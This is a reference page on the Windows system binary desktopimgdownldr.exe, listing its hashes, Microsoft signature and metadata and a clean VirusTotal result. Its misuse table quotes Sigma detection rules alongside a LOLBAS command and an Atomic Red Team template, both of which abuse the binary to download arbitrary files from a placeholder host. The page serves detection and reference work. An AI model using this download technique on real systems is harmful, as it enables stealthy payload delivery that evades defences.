desktopimgdownldr.exe
- File Path: C:\Windows\system32\desktopimgdownldr.exe
- Description: desktopimgdownldr.exe
Hashes
Type | Hash |
---|---|
MD5 | AECDFE9512F9ABF601B5B439FAA2B64A |
SHA1 | DD4E992C75E791094449FD52F646233C9AD06654 |
SHA256 | 1F336FA7255266CA76D26928DA7A2E0D4446F4CAE7F2041218BB2B166A97504D |
SHA384 | 0607C22104D22394E41CCE21C6720AC85C5174926866B62FA4FF73FBD06704628BDF9EF52D71DDE6A44DE5A1C1931C49 |
SHA512 | 8DB2B94D74817B4B2B59B95CC7FEB9963CDCA372A8144634DFBB9258261B5AD6024B4BF37B48C73C51CEA417585FEFC1F45ED5080F4292AADEB7B6FC5878BCFB |
SSDEEP | 1536:OarCi80YW9i3P9fS+4mh1yUUt1Thu3SkJXDuMOI14uDLRS4Xe6KXQXQX+:nmYQhIt183SkJTuxuDdSkKAXb |
IMP | 4497ED51F6847EDEE6F31E6DE69B6378 |
PESHA1 | 0A683F53F11ED02115F415709AA60D2387EF9B0E |
PE256 | 3E3017729AE251D02AEE1DE4F0571C297BD06231A74A9CB4EFD45AA6EC62F1EF |
Runtime Data
Loaded Modules:
Path |
---|
C:\Windows\system32\desktopimgdownldr.exe |
C:\Windows\System32\KERNEL32.DLL |
C:\Windows\System32\KERNELBASE.dll |
C:\Windows\SYSTEM32\ntdll.dll |
Signature
- Status: Signature verified.
- Serial: 3300000266BD1580EFA75CD6D3000000000266
- Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: desktopimgdownldr.exe
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.19041.1 (WinBuild.160101.0800)
- Product Version: 10.0.19041.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/74
- VirusTotal Link: https://www.virustotal.com/gui/file/1f336fa7255266ca76d26928da7a2e0d4446f4cae7f2041218bb2b166a97504d/detection
Possible Misuse
The following table contains possible examples of desktopimgdownldr.exe being misused. While desktopimgdownldr.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | file_event_win_susp_desktopimgdownldr_file.yml | title: Suspicious Desktopimgdownldr Target File | DRL 1.0 |
sigma | file_event_win_susp_desktopimgdownldr_file.yml | description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension | DRL 1.0 |
sigma | proc_creation_win_susp_copy_system32.yml | description: Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name | DRL 1.0 |
sigma | proc_creation_win_susp_desktopimgdownldr.yml | title: Suspicious Desktopimgdownldr Command | DRL 1.0 |
sigma | proc_creation_win_susp_desktopimgdownldr.yml | description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet | DRL 1.0 |
LOLBAS | Desktopimgdownldr.yml | Name: Desktopimgdownldr.exe | |
LOLBAS | Desktopimgdownldr.yml | - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr | |
LOLBAS | Desktopimgdownldr.yml | - Path: c:\windows\system32\desktopimgdownldr.exe | |
LOLBAS | Desktopimgdownldr.yml | - IOC: desktopimgdownldr.exe that creates non-image file | |
atomic-red-team | index.md | - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | T1197.md | - Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) | MIT License. © 2018 Red Canary |
atomic-red-team | T1197.md | ## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) | MIT License. © 2018 Red Canary |
atomic-red-team | T1197.md | This test simulates using desktopimgdownldr.exe to download a malicious file | MIT License. © 2018 Red Canary |
atomic-red-team | T1197.md | and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ | MIT License. © 2018 Red Canary |
atomic-red-team | T1197.md | set “#{download_path}” && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr | MIT License. © 2018 Red Canary |
MIT License. Copyright (c) 2020-2021 Strontic.